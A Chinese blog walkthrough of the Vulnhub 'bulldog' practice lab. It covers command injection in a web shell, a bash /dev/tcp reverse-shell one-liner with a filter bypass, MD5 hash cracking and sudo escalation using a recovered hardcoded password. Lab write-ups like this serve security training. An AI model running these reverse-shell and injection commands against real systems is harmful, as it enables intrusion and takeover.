Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

最新推荐文章于 2024-06-03 20:06:58 发布
最新推荐文章于 2024-06-03 20:06:58 发布
阅读量2.6k 收藏 2
点赞数
分类专栏: Vulnhub-CTF 渗透测试 文章标签: web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45722813/article/details/121337312
版权

Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/
下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机
在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址
在这里插入图片描述
这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置
https://blog.csdn.net/qq_45722813/article/details/121324686

得到靶机IP地址后再使用命令nmap -A -p- 192.168.172.137扫描靶机的操作系统及版本,开放端口和服务等,这里发现靶机操作系统版本,开放端口为23对应ssh服务,80和8080端口都对应http服务
在这里插入图片描述
然后打开浏览器在地址栏输入靶机IP地址回车打开网页
在这里插入图片描述
点开“Public Notice”查看,这里我用划词翻译翻译了一下,但是好像没什么用
在这里插入图片描述
然后我们在kali命令行中输入dirb http://192.168.172.137扫描后台目录发现了/admi/dev/dev/shell/
在这里插入图片描述
然后再浏览器地址栏输入http://192.168.172.137/admin,发现一个登录页面
在这里插入图片描述
查看源码,没有什么信息和提示
在这里插入图片描述
把地址栏换成http://192.168.172.137/dev/回车看看,还是一堆英文,但是最下面看到有一些好像是啥用户名或邮箱地址的东西
在这里插入图片描述
再把地址栏的地址换成http://192.168.172.137/dev/shell,提示我们要先想服务器验证才能使用shell
在这里插入图片描述
所以回到刚才的http://192.168.172.137/dev/,然后我们查看源码,发现一些奇怪的东西
在这里插入图片描述
猜测应该是MD5,然后拿去md5解码,得到了nick对应的解码为nulldog,sarah对应的解码为nulldoglover,
在这里插入图片描述
然后回到开始的登录页面,输入用户名和密码进行登录
在这里插入图片描述
登录进去发现还说什么也没有,查看源码也没什么东西
在这里插入图片描述
现在再回到http://192.168.172.137/dev/shell/,发现可以打开页面了,还有一个shell输入框并告诉了可以输入哪些命令,这里应该是远程命令执行
在这里插入图片描述
输入ifconfig | ls有ls的显示,存在命令注入
在这里插入图片描述
然后我们尝试反弹shell,首先在kali机使用命令nc -lnvp 6666进行监听
在这里插入图片描述

然后在web-shell的输入框中输入命令bash -i >& /dev/tcp/192.168.172.131/6666 0>&1执行,但是发现被挡了,他发现我进行攻击了
在这里插入图片描述
然后换种方式,输入命令echo "bash -i >& /dev/tcp/192.168.172.131/6666 0>&1" | bash,执行就可以了
在这里插入图片描述
成功反弹shell
在这里插入图片描述
查看目录,在/home目录下发现一个bulldogadmin
在这里插入图片描述
但是进到bulldogadmin目录下什么都没有
在这里插入图片描述

首先使用命令cat /etc/passwd查看所有用户
在这里插入图片描述
同时发现bulldogadmin是一个用户,所以使用命令find / -user bulldogadmin 2>/dev/null查找bulldogadmin用户的文件,发现这几个隐藏文件
在这里插入图片描述
使用命令cat /home/bulldogadmin/.hiddenadmindirectory/note查看文件内容
在这里插入图片描述
全是英文,将其复制到百度翻译中进行翻译
在这里插入图片描述
再查看另一个文件,命令cat /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp查看,但是全是乱码
在这里插入图片描述
使用命令strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp将文件内容转化为可打印字符在这里插入图片描述
然后直接使用sudo su命令进行提权,发现不行
在这里插入图片描述

出现上面的情况是因为我们是反弹回来的nc shell,这个shell的使用是有限制的,我们要使用命令python -c "import pty; pty.spawn('/bin/bash')"设置tty,将其转化为交互式shell,以便能够完全交互和使用其所有功能
在这里插入图片描述
还是不行,要在命令前面加上sudo才有权限执行
在这里插入图片描述
可以是可以了,但是需要输入用户密码,先试一下bulldog,但是发现不行
在这里插入图片描述
刚才我们将那个乱码文件转化后显示的内容中有一串super password之类的字符串,去掉其中的H组成字符串SUPERultimatePASSWORDyouCANTget,发现成了,已经提权到root用户
在这里插入图片描述
输入cd回车跳转到根目录下,ls命令查看文件及目录,发现有个congrats.txt文件,使用命令cat congrats.txt打开文件查看内容
在这里插入图片描述
它提示这里有两种方式提权到root用户权限,还有一种暂时不知道,就到这里了

参考文章:
https://www.freebuf.com/column/200047.html

某某IT打工仔
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试-vulnhub靶机 bulldog
2301_79441074的博客
11-23 41
命令执行漏洞
靶机渗透【bulldog
学信安技术 卫国家之门
11-04 4306
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
vuInhub靶场实战系列--bulldog-1
最新发布
weixin_45221204的博客
06-03 1176
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。😃使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
Bulldog靶场记录
weixin_46411728的博客
09-18 863
bulldog靶场
vulnhub靶场bulldog1
kukudeshuo的博客
08-12 246
vulnhub靶场bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128) 靶机:bulldog1(192.168.109.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.157 使用nmap扫描查看目标靶机端口开放
vulnhub】--- bulldog2靶机
qq_43168364的博客
08-21 407
目录 一、实验环境 靶机:bulldog2靶机(192.168.1.102、192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、靶机设置 我们首先进行登录 我们发现登录进去之后靶机是没有IP地址的,我们看看它的网卡配置文件。 这里网卡设置的是dhcp,我们可以通过dhclient命令来获取IP。建议设置为桥接。 现在两个网卡就都有IP地址了。接下来就可以进行渗透了。 三、信息收集 首先用nmap进行主机发现,命令:nmap -sn 192.168.1.
Vulnhub 靶机 Stapler write up samba+wp advanced-video ->mysql 密码 连接 john解密 登录后台 wp插件getshell sudo提权
YouthBelief的博客
12-09 1955
Stapler write up0x00 靶机搭建0x01 信息收集0x02 漏洞挖掘web思路mysql 思路ftp 思路139 samba思路步骤一:ftp匿名访问步骤二:samba139测试步骤三:web渗透 80步骤四:web渗透12380端口 0x00 靶机搭建 Virtual box 导入虚拟机启动 网卡设为 host-only 0x01 信息收集 ip探测 要渗透靶机 需要知道目标ip地址 用 nmap 探测 -sP ping 探测 nmap -sP 192.168.56.0/24 19
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
bulldog-books:UGA CSCI 4050的在线书店。使用React和Node创建
03-29
布尔道夫书 这是一个使用MERN堆栈为UGA CSCI 4050创建的oneline书店项目。 入门 有关安装项目的说明,请查看我们的github Wiki。 依存关系 npm MongoDB的 作者 加里·巴恩斯 亨特·威尔金斯(Hunter Wilkins) ...
bulldog_shop
05-09
该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) 部署说明 … 如果...
British Bulldog Themes & New Tab-crx插件
03-16
英国斗牛犬主题和新标签是具有4K壁纸,天气,时钟和更多惊人功能的超酷扩展。 英国斗牛犬主题和新标签是具有4K壁纸,天气,时钟和更多惊人功能的超酷扩展。 英国斗牛犬的真正超级粉丝?? 享受我的酷背景。 每次安装...
Vulnhub靶机】DC-2(sudo git提权 )
过期的秋刀鱼
08-03 637
请注意,您需要将渗透测试设备上的 hosts 文件设置为:显然,将 192.168.0.145 替换为 DC-2 的实际 IP 地址。它将使生活变得更加简单(如果没有它,某些 CMS 可能无法工作)。
【甄选靶场Vulnhub百个项目渗透——项目十六:FristiLeaks_1.3(文件上传,py脚本改写,sudo提权,脏牛提权,源码获取)
人间体佐菲的博客
09-18 701
网络安全,基础,靶场,信息安全渗透测试,红队
VulnHub SICKOS: 1.1
人若无名,便可专心练剑
10-24 139
简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。在http://192.168.103.177/wolfcms/docs/updating.txt页面中记录了更新的信息,发现系统采用的cms版本最新是0.8.2,搜索对应版本后发现存在文件上传漏洞。
VulnHub渗透测试实战靶场 - Bulldog: 1
LYJ20010728的博客
08-05 469
VulnHub渗透测试实战靶场 - Bulldog: 1环境下载Bulldog: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Bulldog: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 获取到IP地址为:192.168.56.101 渗透测试
【vulhub】Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
qq_45300786的博客
04-17 833
执行命令的话,就用原来的payload 原poc POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
VulnHub靶场-bulldog
hxync的博客
08-07 305
靶场下载地址:http://www.vulnhub.com/entry/bulldog-1,211/ 下载之后用VirtualBox打开即可。 搭建好靶场之后可以看到ip 用kali自带的火狐访问一下这个ip,没有发现什么有用的信息 用dirbuster扫一下 扫到的内容如下 访问admin发现后台登录页面 访问dev发现有一个web-shell链接 点击之后会提示需要认证 dev页面翻译一下,可以知道网站是用的Django,并且开启了ssh Rob...
渗透测试】靶机渗透Vulnhub-bulldog
SunnyCat
06-01 2568
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
以下是双向适配器类图和实现代码: ![adapter-pattern](https://user-images.githubusercontent.com/45758449/116464798-0e07c280-a89d-11eb-8b3e-7c3a88b9c7d9.png) ```python # Target interface class Cat: def catch_mice(self) -> str: pass # Adaptee interface class Dog: def bark(self) -> str: pass # Adaptee class Bulldog(Dog): def bark(self) -> str: return "Woof! Woof!" # Adapter class DogAdapter(Cat): def __init__(self, dog: Dog): self.dog = dog def catch_mice(self) -> str: return self.dog.bark() # Client code if __name__ == "__main__": bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,表示猫抓老鼠。我们还有一个Adaptee接口`Dog`,它定义了一个`bark()`方法,表示狗叫。`Bulldog`是`Dog`接口的一个具体实现。 现在我们需要一个适配器类`DogAdapter`来使得猫可以学狗叫。它实现了`Cat`接口,并将`Dog`对象作为适配器构造函数的参数。在`catch_mice()`方法中,它调用`Dog`对象的`bark()`方法来模拟狗叫声。 在客户端代码中,我们创建了一个`Bulldog`对象和一个`Cat`对象。然后我们创建了一个`DogAdapter`对象,并将`Bulldog`对象传递给它。最后,我们通过适配器对象调用`catch_mice()`方法,并输出适配的结果。 这就是双向适配器模式的一个简单实现。当然,你可以根据自己的需求和场景来进行改进和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值